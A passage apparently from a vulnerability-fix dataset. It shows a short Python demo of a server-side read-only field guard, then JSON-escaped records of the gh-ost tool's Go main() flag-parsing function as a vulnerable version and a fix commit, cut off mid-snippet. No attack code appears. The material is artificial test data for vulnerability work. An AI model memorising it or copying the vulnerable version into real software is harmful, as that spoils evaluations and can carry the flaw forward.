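        self.fields = fields
    def populate_obj(self, obj):
        for f in self.fields:
            if not f.flags.get("readonly"):  # the server-side guard
                f.populate_obj(obj)

class DagRun:
    conf, note = {"retries": 1}, ""

form = Form(Field("conf", ReadOnly()), Field("note"))
form.fields[0].data = {"retries": 999}       # tampered "read-only" field
form.fields[1].data = "looks fine"
run = DagRun()
form.populate_obj(run)
print(run.conf, "|", run.note)               # {'retries': 1} | looks fine
```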
Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.CliMasterPassword, \"master-password\", \"\", \"MySQL password on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.ConfigFile, \"conf\", \"\", \"Config file\")\n\taskPass := flag.Bool(\"ask-pass\", false, \"prompt for MySQL password\")\n\n\tflag.BoolVar(&migrationContext.UseTLS, \"ssl\", false, \"Enable SSL encrypted connections to MySQL hosts\")\n\tflag.StringVar(&migrationContext.TLSCACertificate, \"ssl-ca\", \"\", \"CA certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSCertificate, \"ssl-cert\", \"\", \"Certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSKey, \"ssl-key\", \"\", \"Key in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.BoolVar(&migrationContext.TLSAllowInsecure, \"ssl-allow-insecure\", false, \"Skips verification of MySQL hosts' certificate chain and host name. Requires --ssl\")\n\n\tflag.StringVar(&migrationContext.DatabaseName, \"database\", \"\", \"database name (mandatory)\")\n\tflag.StringVar(&migrationContext.OriginalTableName, \"table\", \"\", \"table name (mandatory)\")\n\tflag.StringVar(&migrationContext.AlterStatement, \"alter\", \"\", \"alter statement (mandatory)\")\n\tflag.BoolVar(&migrationContext.CountTableRows, \"exact-rowcount\", false, \"actually count table rows as opposed to estimate them (results in more accurate progress estimation)\")\n\tflag.BoolVar(&migrationContext.ConcurrentCountTableRows, \"concurrent-rowcount\", true, \"(with --exact-rowcount), when true (default): count rows after row-copy begins, concurrently, and adjust row estimate later on; when false: first count rows, then start row copy\")\n\tflag.BoolVar(&migrationContext.AllowedRunningOnMaster, \"allow-on-master\", false, \"allow this migration to run directly on master. Preferably it would run on a replica\")\n\tflag.BoolVar(&migrationContext.AllowedMasterMaster, \"allow-master-master\", false, \"explicitly allow running in a master-master setup\")\n\tflag.BoolVar(&migrationContext.NullableUniqueKeyAllowed, \"allow-nullable-unique-key\", false, \"allow gh-ost to migrate based on a unique key with nullable columns. As long as no NULL values exist, this should be OK. If NULL values exist in chosen key, data may be corrupted. Use at your own risk!\")\n\tflag.BoolVar(&migrationContext.ApproveRenamedColumns, \"approve-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag approves that gh-ost's interpretation is correct\")\n\tflag.BoolVar(&migrationContext.SkipRenamedColumns, \"skip-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag tells gh-ost to skip the renamed columns, i.e. to treat what gh-ost thinks are renamed columns as unrelated columns. NOTE: you may lose column data\")\n\tflag.BoolVar(&migrationContext.IsTungsten, \"tungsten\", false, \"explicitly let gh-ost know that you are running on a tungsten-replication based topology (you are likely to also provide --assume-master-host)\")\n\tflag.BoolVar(&migrationContext.DiscardForeignKeys, \"discard-foreign-keys\", false, \"DANGER! 
This flag will migrate a table that has foreign keys and will NOT create foreign keys on the ghost table, thus your altered table will have NO foreign keys. This is useful for intentional dropping of foreign keys\")\n\tflag.BoolVar(&migrationContext.SkipForeignKeyChecks, \"skip-foreign-key-checks\", false, \"set to 'true' when you know for certain there are no foreign keys on your table, and wish to skip the time it takes for gh-ost to verify that\")\n\tflag.BoolVar(&migrationContext.SkipStrictMode, \"skip-strict-mode\", false, \"explicitly tell gh-ost binlog applier not to enforce strict sql mode\")\n\tflag.BoolVar(&migrationContext.AliyunRDS, \"aliyun-rds\", false, \"set to 'true' when you execute on Aliyun RDS.\")\n\tflag.BoolVar(&migrationContext.GoogleCloudPlatform, \"gcp\", false, \"set to 'true' when you execute on a 1st generation Google Cloud Platform (GCP).\")\n\tflag.BoolVar(&migrationContext.AzureMySQL, \"azure\", false, \"set to 'true' when you execute on Azure Database on MySQL.\")\n\n\texecuteFlag := flag.Bool(\"execute\", false, \"actually execute the alter & migrate the table. Default is noop: do some tests and exit\")\n\tflag.BoolVar(&migrationContext.TestOnReplica, \"test-on-replica\", false, \"Have the migration run on a replica, not on the master. At the end of migration replication is stopped, and tables are swapped and immediately swap-revert. Replication remains stopped and you can compare the two tables for building trust\")\n\tflag.BoolVar(&migrationContext.TestOnReplicaSkipReplicaStop, \"test-on-replica-skip-replica-stop\", false, \"When --test-on-replica is enabled, do not issue commands stop replication (requires --test-on-replica)\")\n\tflag.BoolVar(&migrationContext.MigrateOnReplica, \"migrate-on-replica\", false, \"Have the migration run on a replica, not on the master. This will do the full migration on the replica including cut-over (as opposed to --test-on-replica)\")\n\n\tflag.BoolVar(&migrationContext.OkToDropTable, \"ok-to-drop-table\", false, \"Shall the tool drop the old table at end of operation. DROPping tables can be a long locking operation, which is why I'm not doing it by default. I'm an online tool, yes?\")\n\tflag.BoolVar(&migrationContext.InitiallyDropOldTable, \"initially-drop-old-table\", false, \"Drop a possibly existing OLD table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.InitiallyDropGhostTable, \"initially-drop-ghost-table\", false, \"Drop a possibly existing Ghost table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.TimestampOldTable, \"timestamp-old-table\", false, \"Use a timestamp in old table name. This makes old table names unique and non conflicting cross migrations\")\n\tcutOver := flag.String(\"cut-over\", \"atomic\", \"choose cut-over type (default|atomic, two-step)\")\n\tflag.BoolVar(&migrationContext.ForceNamedCutOverCommand, \"force-named-cut-over\", false, \"When true, the 'unpostpone|cut-over' interactive command must name the migrated table\")\n\tflag.BoolVar(&migrationContext.ForceNamedPanicCommand, \"force-named-panic\", false, \"When true, the 'panic' interactive command must name the migrated table\")\n\n\tflag.BoolVar(&migrationContext.SwitchToRowBinlogFormat, \"switch-to-rbr\", false, \"let this tool automatically switch binary log format to 'ROW' on the replica, if needed. The format will NOT be switched back. 
I'm too scared to do that, and wish to protect you if you happen to execute another migration while this one is running\")\n\tflag.BoolVar(&migrationContext.AssumeRBR, \"assume-rbr\", false, \"set to 'true' when you know for certain your server uses 'ROW' binlog_format. gh-ost is unable to tell, event after reading binlog_format, whether the replication process does indeed use 'ROW', and restarts replication to be certain RBR setting is applied. Such operation requires SUPER privileges which you might not have. Setting this flag avoids restarting replication and you can proceed to use gh-ost without SUPER privileges\")\n\tflag.BoolVar(&migrationContext.CutOverExponentialBackoff, \"cut-over-exponential-backoff\", false, \"Wait exponentially longer intervals between failed cut-over attempts. Wait intervals obey a maximum configurable with 'exponential-backoff-max-interval').\")\n\texponentialBackoffMaxInterval := flag.Int64(\"exponential-backoff-max-interval\", 64, \"Maximum number of seconds to wait between attempts when performing various operations with exponential backoff.\")\n\tchunkSize := flag.Int64(\"chunk-size\", 1000, \"amount of rows to handle in each iteration (allowed range: 100-100,000)\")\n\tdmlBatchSize := flag.Int64(\"dml-batch-size\", 10, \"batch size for DML events to apply in a single transaction (range 1-100)\")\n\tdefaultRetries := flag.Int64(\"default-retries\", 60, \"Default number of retries for various operations before panicking\")\n\tcutOverLockTimeoutSeconds := flag.Int64(\"cut-over-lock-timeout-seconds\", 3, \"Max number of seconds to hold locks on tables while attempting to cut-over (retry attempted when lock exceeds timeout)\")\n\tniceRatio := flag.Float64(\"nice-ratio\", 0, \"force being 'nice', imply sleep time per chunk time; range: [0.0..100.0]. Example values: 0 is aggressive. 1: for every 1ms spent copying rows, sleep additional 1ms (effectively doubling runtime); 0.7: for every 10ms spend in a rowcopy chunk, spend 7ms sleeping immediately after\")\n\n\tmaxLagMillis := flag.Int64(\"max-lag-millis\", 1500, \"replication lag at which to throttle operation\")\n\treplicationLagQuery := flag.String(\"replication-lag-query\", \"\", \"Deprecated. gh-ost uses an internal, subsecond resolution query\")\n\tthrottleControlReplicas := flag.String(\"throttle-control-replicas\", \"\", \"List of replicas on which to check for lag; comma delimited. Example: myhost1.com:3306,myhost2.com,myhost3.com:3307\")\n\tthrottleQuery := flag.String(\"throttle-query\", \"\", \"when given, issued (every second) to check if operation should throttle. Expecting to return zero for no-throttle, >0 for throttle. Query is issued on the migrated server. 
Make sure this query is lightweight\")\n\tthrottleHTTP := flag.String(\"throttle-http\", \"\", \"when given, gh-ost checks given URL via HEAD request; any response code other than 200 (OK) causes throttling; make sure it has low latency response\")\n\tignoreHTTPErrors := flag.Bool(\"ignore-http-errors\", false, \"ignore HTTP connection errors during throttle check\")\n\theartbeatIntervalMillis := flag.Int64(\"heartbeat-interval-millis\", 100, \"how frequently would gh-ost inject a heartbeat value\")\n\tflag.StringVar(&migrationContext.ThrottleFlagFile, \"throttle-flag-file\", \"\", \"operation pauses when this file exists; hint: use a file that is specific to the table being altered\")\n\tflag.StringVar(&migrationContext.ThrottleAdditionalFlagFile, \"throttle-additional-flag-file\", \"/tmp/gh-ost.throttle\", \"operation pauses when this file exists; hint: keep default, use for throttling multiple gh-ost operations\")\n\tflag.StringVar(&migrationContext.PostponeCutOverFlagFile, \"postpone-cut-over-flag-file\", \"\", \"while this file exists, migration will postpone the final stage of swapping tables, and will keep on syncing the ghost table. Cut-over/swapping would be ready to perform the moment the file is deleted.\")\n\tflag.StringVar(&migrationContext.PanicFlagFile, \"panic-flag-file\", \"\", \"when this file is created, gh-ost will immediately terminate, without cleanup\")\n\n\tflag.BoolVar(&migrationContext.DropServeSocket, \"initially-drop-socket-file\", false, \"Should gh-ost forcibly delete an existing socket file. Be careful: this might drop the socket file of a running migration!\")\n\tflag.StringVar(&migrationContext.ServeSocketFile, \"serve-socket-file\", \"\", \"Unix socket file to serve on. Default: auto-determined and advertised upon startup\")\n\tflag.Int64Var(&migrationContext.ServeTCPPort, \"serve-tcp-port\", 0, \"TCP port to serve on. Default: disabled\")\n\n\tflag.StringVar(&migrationContext.HooksPath, \"hooks-path\", \"\", \"directory where hook files are found (default: empty, ie. hooks disabled). Hook files found on this path, and conforming to hook naming conventions will be executed\")\n\tflag.StringVar(&migrationContext.HooksHintMessage, \"hooks-hint\", \"\", \"arbitrary message to be injected to hooks via GH_OST_HOOKS_HINT, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintOwner, \"hooks-hint-owner\", \"\", \"arbitrary name of owner to be injected to hooks via GH_OST_HOOKS_HINT_OWNER, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintToken, \"hooks-hint-token\", \"\", \"arbitrary token to be injected to hooks via GH_OST_HOOKS_HINT_TOKEN, for your convenience\")\n\n\tflag.UintVar(&migrationContext.ReplicaServerId, \"replica-server-id\", 99999, \"server id used by gh-ost process. Default: 99999\")\n\n\tmaxLoad := flag.String(\"max-load\", \"\", \"Comma delimited status-name=threshold. e.g: 'Threads_running=100,Threads_connected=500'. When status exceeds threshold, app throttles writes\")\n\tcriticalLoad := flag.String(\"critical-load\", \"\", \"Comma delimited status-name=threshold, same format as --max-load. When status exceeds threshold, app panics and quits\")\n\tflag.Int64Var(&migrationContext.CriticalLoadIntervalMilliseconds, \"critical-load-interval-millis\", 0, \"When 0, migration immediately bails out upon meeting critical-load. 
When non-zero, a second check is done after given interval, and migration only bails out if 2nd check still meets critical load\")\n\tflag.Int64Var(&migrationContext.CriticalLoadHibernateSeconds, \"critical-load-hibernate-seconds\", 0, \"When non-zero, critical-load does not panic and bail out; instead, gh-ost goes into hibernation for the specified duration. It will not read/write anything from/to any server\")\n\tquiet := flag.Bool(\"quiet\", false, \"quiet\")\n\tverbose := flag.Bool(\"verbose\", false, \"verbose\")\n\tdebug := flag.Bool(\"debug\", false, \"debug mode (very verbose)\")\n\tstack := flag.Bool(\"stack\", false, \"add stack trace upon error\")\n\thelp := flag.Bool(\"help\", false, \"Display usage\")\n\tversion := flag.Bool(\"version\", false, \"Print version & exit\")\n\tcheckFlag := flag.Bool(\"check-flag\", false, \"Check if another flag exists/supported. This allows for cross-version scripting. Exits with 0 when all additional provided flags exist, nonzero otherwise. You must provide (dummy) values for flags that require a value. Example: gh-ost --check-flag --cut-over-lock-timeout-seconds --nice-ratio 0\")\n\tflag.StringVar(&migrationContext.ForceTmpTableName, \"force-table-names\", \"\", \"table name prefix to be used on the temporary tables\")\n\tflag.CommandLine.SetOutput(os.Stdout)\n\n\tflag.Parse()\n\n\tif *checkFlag {\n\t\treturn\n\t}\n\tif *help {\n\t\tfmt.Fprintf(os.Stdout, \"Usage of gh-ost:\\n\")\n\t\tflag.PrintDefaults()\n\t\treturn\n\t}\n\tif *version {\n\t\tappVersion := AppVersion\n\t\tif appVersion == \"\" {\n\t\t\tappVersion = \"unversioned\"\n\t\t}\n\t\tfmt.Println(appVersion)\n\t\treturn\n\t}\n\n\tmigrationContext.Log.SetLevel(log.ERROR)\n\tif *verbose {\n\t\tmigrationContext.Log.SetLevel(log.INFO)\n\t}\n\tif *debug {\n\t\tmigrationContext.Log.SetLevel(log.DEBUG)\n\t}\n\tif *stack {\n\t\tmigrationContext.Log.SetPrintStackTrace(*stack)\n\t}\n\tif *quiet {\n\t\t// Override!!\n\t\tmigrationContext.Log.SetLevel(log.ERROR)\n\t}\n\n\tif migrationContext.AlterStatement == \"\" {\n\t\tlog.Fatalf(\"--alter must be provided and statement must not be empty\")\n\t}\n\tparser := sql.NewParserFromAlterStatement(migrationContext.AlterStatement)\n\tmigrationContext.AlterStatementOptions = parser.GetAlterStatementOptions()\n\n\tif migrationContext.DatabaseName == \"\" {\n\t\tif parser.HasExplicitSchema() {\n\t\t\tmigrationContext.DatabaseName = parser.GetExplicitSchema()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n\t\t}\n\t}\n\tif migrationContext.OriginalTableName == \"\" {\n\t\tif parser.HasExplicitTable() {\n\t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--table must be provided and table name must not be empty, or --alter must specify table name\")\n\t\t}\n\t}\n\tmigrationContext.Noop = !(*executeFlag)\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.MigrateOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --migrate-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.MigrateOnReplica && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--migrate-on-replica and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.SwitchToRowBinlogFormat && 
migrationContext.AssumeRBR {\n\t\tmigrationContext.Log.Fatalf(\"--switch-to-rbr and --assume-rbr are mutually exclusive\")\n\t}\n\tif migrationContext.TestOnReplicaSkipReplicaStop {\n\t\tif !migrationContext.TestOnReplica {\n\t\t\tmigrationContext.Log.Fatalf(\"--test-on-replica-skip-replica-stop requires --test-on-replica to be enabled\")\n\t\t}\n\t\tmigrationContext.Log.Warning(\"--test-on-replica-skip-replica-stop enabled. We will not stop replication before cut-over. Ensure you have a plugin that does this.\")\n\t}\n\tif migrationContext.CliMasterUser != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-user requires --assume-master-host\")\n\t}\n\tif migrationContext.CliMasterPassword != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-password requires --assume-master-host\")\n\t}\n\tif migrationContext.TLSCACertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-ca requires --ssl\")\n\t}\n\tif migrationContext.TLSCertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-cert requires --ssl\")\n\t}\n\tif migrationContext.TLSKey != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-key requires --ssl\")\n\t}\n\tif migrationContext.TLSAllowInsecure && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-allow-insecure requires --ssl\")\n\t}\n\tif *replicationLagQuery != \"\" {\n\t\tmigrationContext.Log.Warningf(\"--replication-lag-query is deprecated\")\n\t}\n\n\tswitch *cutOver {\n\tcase \"atomic\", \"default\", \"\":\n\t\tmigrationContext.CutOverType = base.CutOverAtomic\n\tcase \"two-step\":\n\t\tmigrationContext.CutOverType = base.CutOverTwoStep\n\tdefault:\n\t\tmigrationContext.Log.Fatalf(\"Unknown cut-over: %s\", *cutOver)\n\t}\n\tif err := migrationContext.ReadConfigFile(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadThrottleControlReplicaKeys(*throttleControlReplicas); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadMaxLoad(*maxLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadCriticalLoad(*criticalLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif migrationContext.ServeSocketFile == \"\" {\n\t\tmigrationContext.ServeSocketFile = fmt.Sprintf(\"/tmp/gh-ost.%s.%s.sock\", migrationContext.DatabaseName, migrationContext.OriginalTableName)\n\t}\n\tif *askPass {\n\t\tfmt.Println(\"Password:\")\n\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\tif err != nil {\n\t\t\tmigrationContext.Log.Fatale(err)\n\t\t}\n\t\tmigrationContext.CliPassword = string(bytePassword)\n\t}\n\tmigrationContext.SetHeartbeatIntervalMilliseconds(*heartbeatIntervalMillis)\n\tmigrationContext.SetNiceRatio(*niceRatio)\n\tmigrationContext.SetChunkSize(*chunkSize)\n\tmigrationContext.SetDMLBatchSize(*dmlBatchSize)\n\tmigrationContext.SetMaxLagMillisecondsThrottleThreshold(*maxLagMillis)\n\tmigrationContext.SetThrottleQuery(*throttleQuery)\n\tmigrationContext.SetThrottleHTTP(*throttleHTTP)\n\tmigrationContext.SetIgnoreHTTPErrors(*ignoreHTTPErrors)\n\tmigrationContext.SetDefaultNumRetries(*defaultRetries)\n\tmigrationContext.ApplyCredentials()\n\tif err := migrationContext.SetupTLS(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.SetCutOverLockTimeoutSeconds(*cutOverLockTimeoutSeconds); err != nil 
{\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\tif err := migrationContext.SetExponentialBackoffMaxInterval(*exponentialBackoffMaxInterval); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\n\tlog.Infof(\"starting gh-ost %+v\", AppVersion)\n\tacceptSignals(migrationContext)\n\n\tmigrator := logic.NewMigrator(migrationContext)\n\terr := migrator.Migrate()\n\tif err != nil {\n\t\tmigrator.ExecOnFailureHook()\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tfmt.Fprintf(os.Stdout, \"# Done\\n\")\n}"}], "fix_func": [{"id": "fix_go_183_1", "commit": "a91ab04", "file_path": "go/cmd/gh-ost/main.go", "start_line": 48, "end_line": 306, "snippet": "func main() {\n\tmigrationContext := base.NewMigrationContext()\n\tflag.StringVar(&migrationContext.InspectorConnectionConfig.Key.Hostname, \"host\", \"127.0.0.1\", \"MySQL hostname (preferably a replica, not the master)\")\n\tflag.StringVar(&migrationContext.AssumeMasterHostname, \"assume-master-host\", \"\", \"(optional) explicitly tell gh-ost the identity of the master. Format: some.host.com[:port] This is useful in master-master setups where you wish to pick an explicit master, or in a tungsten-replicator where gh-ost is unable to determine the master\")\n\tflag.IntVar(&migrationContext.InspectorConnectionConfig.Key.Port, \"port\", 3306, \"MySQL port (preferably a replica, not the master)\")\n\tflag.Float64Var(&migrationContext.InspectorConnectionConfig.Timeout, \"mysql-timeout\", 0.0, \"Connect, read and write timeout for MySQL\")\n\tflag.StringVar(&migrationContext.CliUser, \"user\", \"\", \"MySQL user\")\n\tflag.StringVar(&migrationContext.CliPassword, \"password\", \"\", \"MySQL password\")\n\tflag.StringVar(&migrationContext.CliMasterUser, \"master-user\", \"\", \"MySQL user on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.CliMasterPassword, \"master-password\", \"\", \"MySQL password on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.ConfigFile, \"conf\", \"\", \"Config file\")\n\taskPass := flag.Bool(\"ask-pass\", false, \"prompt for MySQL password\")\n\n\tflag.BoolVar(&migrationContext.UseTLS, \"ssl\", false, \"Enable SSL encrypted connections to MySQL hosts\")\n\tflag.StringVar(&migrationContext.TLSCACertificate, \"ssl-ca\", \"\", \"CA certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSCertificate, \"ssl-cert\", \"\", \"Certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSKey, \"ssl-key\", \"\", \"Key in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.BoolVar(&migrationContext.TLSAllowInsecure, \"ssl-allow-insecure\", false, \"Skips verification of MySQL hosts' certificate chain and host name. 
Requires --ssl\")\n\n\tflag.StringVar(&migrationContext.DatabaseName, \"database\", \"\", \"database name (mandatory)\")\n\tflag.StringVar(&migrationContext.OriginalTableName, \"table\", \"\", \"table name (mandatory)\")\n\tflag.StringVar(&migrationContext.AlterStatement, \"alter\", \"\", \"alter statement (mandatory)\")\n\tflag.BoolVar(&migrationContext.CountTableRows, \"exact-rowcount\", false, \"actually count table rows as opposed to estimate them (results in more accurate progress estimation)\")\n\tflag.BoolVar(&migrationContext.ConcurrentCountTableRows, \"concurrent-rowcount\", true, \"(with --exact-rowcount), when true (default): count rows after row-copy begins, concurrently, and adjust row estimate later on; when false: first count rows, then start row copy\")\n\tflag.BoolVar(&migrationContext.AllowedRunningOnMaster, \"allow-on-master\", false, \"allow this migration to run directly on master. Preferably it would run on a replica\")\n\tflag.BoolVar(&migrationContext.AllowedMasterMaster, \"allow-master-master\", false, \"explicitly allow running in a master-master setup\")\n\tflag.BoolVar(&migrationContext.NullableUniqueKeyAllowed, \"allow-nullable-unique-key\", false, \"allow gh-ost to migrate based on a unique key with nullable columns. As long as no NULL values exist, this should be OK. If NULL values exist in chosen key, data may be corrupted. Use at your own risk!\")\n\tflag.BoolVar(&migrationContext.ApproveRenamedColumns, \"approve-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag approves that gh-ost's interpretation is correct\")\n\tflag.BoolVar(&migrationContext.SkipRenamedColumns, \"skip-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag tells gh-ost to skip the renamed columns, i.e. to treat what gh-ost thinks are renamed columns as unrelated columns. NOTE: you may lose column data\")\n\tflag.BoolVar(&migrationContext.IsTungsten, \"tungsten\", false, \"explicitly let gh-ost know that you are running on a tungsten-replication based topology (you are likely to also provide --assume-master-host)\")\n\tflag.BoolVar(&migrationContext.DiscardForeignKeys, \"discard-foreign-keys\", false, \"DANGER! This flag will migrate a table that has foreign keys and will NOT create foreign keys on the ghost table, thus your altered table will have NO foreign keys. This is useful for intentional dropping of foreign keys\")\n\tflag.BoolVar(&migrationContext.SkipForeignKeyChecks, \"skip-foreign-key-checks\", false, \"set to 'true' when you know for certain there are no foreign keys on your table, and wish to skip the time it takes for gh-ost to verify that\")\n\tflag.BoolVar(&migrationContext.SkipStrictMode, \"skip-strict-mode\", false, \"explicitly tell gh-ost binlog applier not to enforce strict sql mode\")\n\tflag.BoolVar(&migrationContext.AliyunRDS, \"aliyun-rds\", false, \"set to 'true' when you execute on Aliyun RDS.\")\n\tflag.BoolVar(&migrationContext.GoogleCloudPlatform, \"gcp\", false, \"set to 'true' when you execute on a 1st generation Google Cloud Platform (GCP).\")\n\tflag.BoolVar(&migrationContext.AzureMySQL, \"azure\", false, \"set to 'true' when you execute on Azure Database on MySQL.\")\n\n\texecuteFlag := flag.Bool(\"execute\", false, \"actually execute the alter & migrate the table. 
Default is noop: do some tests and exit\")\n\tflag.BoolVar(&migrationContext.TestOnReplica, \"test-on-replica\", false, \"Have the migration run on a replica, not on the master. At the end of migration replication is stopped, and tables are swapped and immediately swap-revert. Replication remains stopped and you can compare the two tables for building trust\")\n\tflag.BoolVar(&migrationContext.TestOnReplicaSkipReplicaStop, \"test-on-replica-skip-replica-stop\", false, \"When --test-on-replica is enabled, do not issue commands stop replication (requires --test-on-replica)\")\n\tflag.BoolVar(&migrationContext.MigrateOnReplica, \"migrate-on-replica\", false, \"Have the migration run on a replica, not on the master. This will do the full migration on the replica including cut-over (as opposed to --test-on-replica)\")\n\n\tflag.BoolVar(&migrationContext.OkToDropTable, \"ok-to-drop-table\", false, \"Shall the tool drop the old table at end of operation. DROPping tables can be a long locking operation, which is why I'm not doing it by default. I'm an online tool, yes?\")\n\tflag.BoolVar(&migrationContext.InitiallyDropOldTable, \"initially-drop-old-table\", false, \"Drop a possibly existing OLD table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.InitiallyDropGhostTable, \"initially-drop-ghost-table\", false, \"Drop a possibly existing Ghost table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.TimestampOldTable, \"timestamp-old-table\", false, \"Use a timestamp in old table name. This makes old table names unique and non conflicting cross migrations\")\n\tcutOver := flag.String(\"cut-over\", \"atomic\", \"choose cut-over type (default|atomic, two-step)\")\n\tflag.BoolVar(&migrationContext.ForceNamedCutOverCommand, \"force-named-cut-over\", false, \"When true, the 'unpostpone|cut-over' interactive command must name the migrated table\")\n\tflag.BoolVar(&migrationContext.ForceNamedPanicCommand, \"force-named-panic\", false, \"When true, the 'panic' interactive command must name the migrated table\")\n\n\tflag.BoolVar(&migrationContext.SwitchToRowBinlogFormat, \"switch-to-rbr\", false, \"let this tool automatically switch binary log format to 'ROW' on the replica, if needed. The format will NOT be switched back. I'm too scared to do that, and wish to protect you if you happen to execute another migration while this one is running\")\n\tflag.BoolVar(&migrationContext.AssumeRBR, \"assume-rbr\", false, \"set to 'true' when you know for certain your server uses 'ROW' binlog_format. gh-ost is unable to tell, event after reading binlog_format, whether the replication process does indeed use 'ROW', and restarts replication to be certain RBR setting is applied. Such operation requires SUPER privileges which you might not have. Setting this flag avoids restarting replication and you can proceed to use gh-ost without SUPER privileges\")\n\tflag.BoolVar(&migrationContext.CutOverExponentialBackoff, \"cut-over-exponential-backoff\", false, \"Wait exponentially longer intervals between failed cut-over attempts. 
Wait intervals obey a maximum configurable with 'exponential-backoff-max-interval').\")\n\texponentialBackoffMaxInterval := flag.Int64(\"exponential-backoff-max-interval\", 64, \"Maximum number of seconds to wait between attempts when performing various operations with exponential backoff.\")\n\tchunkSize := flag.Int64(\"chunk-size\", 1000, \"amount of rows to handle in each iteration (allowed range: 100-100,000)\")\n\tdmlBatchSize := flag.Int64(\"dml-batch-size\", 10, \"batch size for DML events to apply in a single transaction (range 1-100)\")\n\tdefaultRetries := flag.Int64(\"default-retries\", 60, \"Default number of retries for various operations before panicking\")\n\tcutOverLockTimeoutSeconds := flag.Int64(\"cut-over-lock-timeout-seconds\", 3, \"Max number of seconds to hold locks on tables while attempting to cut-over (retry attempted when lock exceeds timeout)\")\n\tniceRatio := flag.Float64(\"nice-ratio\", 0, \"force being 'nice', imply sleep time per chunk time; range: [0.0..100.0]. Example values: 0 is aggressive. 1: for every 1ms spent copying rows, sleep additional 1ms (effectively doubling runtime); 0.7: for every 10ms spend in a rowcopy chunk, spend 7ms sleeping immediately after\")\n\n\tmaxLagMillis := flag.Int64(\"max-lag-millis\", 1500, \"replication lag at which to throttle operation\")\n\treplicationLagQuery := flag.String(\"replication-lag-query\", \"\", \"Deprecated. gh-ost uses an internal, subsecond resolution query\")\n\tthrottleControlReplicas := flag.String(\"throttle-control-replicas\", \"\", \"List of replicas on which to check for lag; comma delimited. Example: myhost1.com:3306,myhost2.com,myhost3.com:3307\")\n\tthrottleQuery := flag.String(\"throttle-query\", \"\", \"when given, issued (every second) to check if operation should throttle. Expecting to return zero for no-throttle, >0 for throttle. Query is issued on the migrated server. Make sure this query is lightweight\")\n\tthrottleHTTP := flag.String(\"throttle-http\", \"\", \"when given, gh-ost checks given URL via HEAD request; any response code other than 200 (OK) causes throttling; make sure it has low latency response\")\n\tignoreHTTPErrors := flag.Bool(\"ignore-http-errors\", false, \"ignore HTTP connection errors during throttle check\")\n\theartbeatIntervalMillis := flag.Int64(\"heartbeat-interval-millis\", 100, \"how frequently would gh-ost inject a heartbeat value\")\n\tflag.StringVar(&migrationContext.ThrottleFlagFile, \"throttle-flag-file\", \"\", \"operation pauses when this file exists; hint: use a file that is specific to the table being altered\")\n\tflag.StringVar(&migrationContext.ThrottleAdditionalFlagFile, \"throttle-additional-flag-file\", \"/tmp/gh-ost.throttle\", \"operation pauses when this file exists; hint: keep default, use for throttling multiple gh-ost operations\")\n\tflag.StringVar(&migrationContext.PostponeCutOverFlagFile, \"postpone-cut-over-flag-file\", \"\", \"while this file 